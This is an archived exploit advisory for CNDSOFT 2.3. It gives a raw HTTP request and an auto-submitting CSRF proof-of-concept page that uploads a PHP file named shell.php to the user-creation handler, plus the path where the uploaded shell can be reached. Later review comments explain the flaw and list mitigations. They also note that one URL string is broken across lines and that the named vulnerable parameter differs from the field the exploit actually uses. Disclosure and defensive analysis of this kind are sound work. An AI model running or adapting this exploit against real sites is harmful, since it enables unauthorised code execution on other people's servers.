CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

2016-10-20T00:00:00
ID PACKETSTORM:139273
Type packetstorm
Reporter Besim
Modified 2016-10-20T00:00:00

Description

                                        
                                            `*=========================================================================================================  
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)  
# Author: Besim  
# Google Dork: -  
# Date: 19/10/2016  
# Type: webapps  
# Platform : PHP  
# Vendor Homepage: -  
# Software Link: http://www.phpexplorer.com/Goster/1227  
# Version: 2.3  
*=========================================================================================================  
  
  
Vulnerable URL and Parameter  
========================================  
  
Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla  
  
Vulnerable Parameter = &mesaj_baslik  
  
  
TECHNICAL DETAILS & POC & POST DATA  
========================================  
  
POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1  
Host: localhost:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla  
aa  
Content-Type: multipart/form-data;  
boundary=---------------------------5035863528338  
Content-Length: 1037  
  
-----------------------------5035863528338  
Content-Disposition: form-data; name="utf8"  
  
a  
-----------------------------5035863528338  
Content-Disposition: form-data; name="authenticity_token"  
  
CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_adi"  
  
meryem  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_sifresi"  
  
meryem  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_mail_adresi"  
m@yop.com  
-----------------------------5035863528338  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
30000  
-----------------------------5035863528338  
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"  
Content-Type: application/octet-stream  
*<?php  
phpinfo();  
  
?>*  
-----------------------------5035863528338  
Content-Disposition: form-data; name="personel_maasi"  
  
5200  
-----------------------------5035863528338--  
  
  
*CSRF PoC - File Upload (Shell.php)*  
  
========================================  
  
<html>  
<!-- CSRF PoC -->  
<!-- Review note (defensive reading): submitRequest() is called as soon as the script runs, so
     merely loading this page in a browser that holds a valid session sends a credentialed
     (withCredentials = true) cross-origin multipart POST to the kullanici_tanimla handler,
     carrying a .php file in the kullanici_resmi part. Two things worth confirming against the
     application: the authenticity_token value in the body is the same fixed literal as in the
     captured request above, which suggests the token is not bound to the session or not
     verified; and the "Vulnerable Parameter" line earlier names mesaj_baslik while this PoC
     uploads via kullanici_resmi. Server-side mitigations: a per-session, unpredictable CSRF
     token that is actually checked, SameSite session cookies plus an Origin/Referer check, and
     an allow-list of upload extensions/MIME types with uploads stored outside the web root. -->
<body>  
<script>  
// Builds and sends the same multipart/form-data request shown in the POST DATA section above.
function submitRequest()  
{  
var xhr = new XMLHttpRequest();  
// NOTE(review): the URL string literal below is broken across two lines in this copy, which is
// not valid JavaScript as printed; presumably a line-wrap introduced when the advisory was archived.
xhr.open("POST", "  
http://site_name/ofis/index.php?is=kullanici_tanimla", true);  
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
// The boundary here must match the one used in every part of the hand-built body below.
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");  
// The victim's session cookies are attached to the request — this is what makes the CSRF effective.
xhr.withCredentials = true;  
// Hand-assembled multipart body, one part per form field of the capture above (CRLF line endings).
var body = "-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"utf8\"\r\n" +  
"\r\n" +  
"\xe2\x9c\x93\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"authenticity_token\"\r\n"  
+  
"\r\n" +  
"CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +  
"\r\n" +  
"meryem\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"  
+  
"\r\n" +  
"meryem\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +  
"\r\n" +  
"m@yop.com\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +  
"\r\n" +  
"30000\r\n" +  
"-----------------------------5035863528338\r\n" +  
// File part: a .php filename with a generic octet-stream type — the server-side upload check
// should reject this on extension/MIME allow-list grounds regardless of the CSRF token.
"Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +  
"Content-Type: application/octet-stream\r\n" +  
"\r\n" +  
"\x3c?php \r\n" +  
"\tphpinfo();\r\n" +  
"\r\n" +  
" ?\x3e\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +  
"\r\n" +  
"5200\r\n" +  
"-----------------------------5035863528338--\r\n";  
// The string is copied code unit by code unit into a byte array, so the \xNN escapes go out as
// single raw bytes (sending the string directly would re-encode it as UTF-8).
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
// Fires automatically on page load; the button below is only a manual re-trigger.
submitRequest();  
</script>  
<form action="#">  
<input type="button" value="Submit request"  
onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
========================================  
  
*Access File : *http://www.site_name/path/personel_resimleri/shell.php  
  
  
RISK  
========================================  
  
An attacker can upload arbitrary files.  
  
  
--  
  
Besim ALTINOK  
  
  
`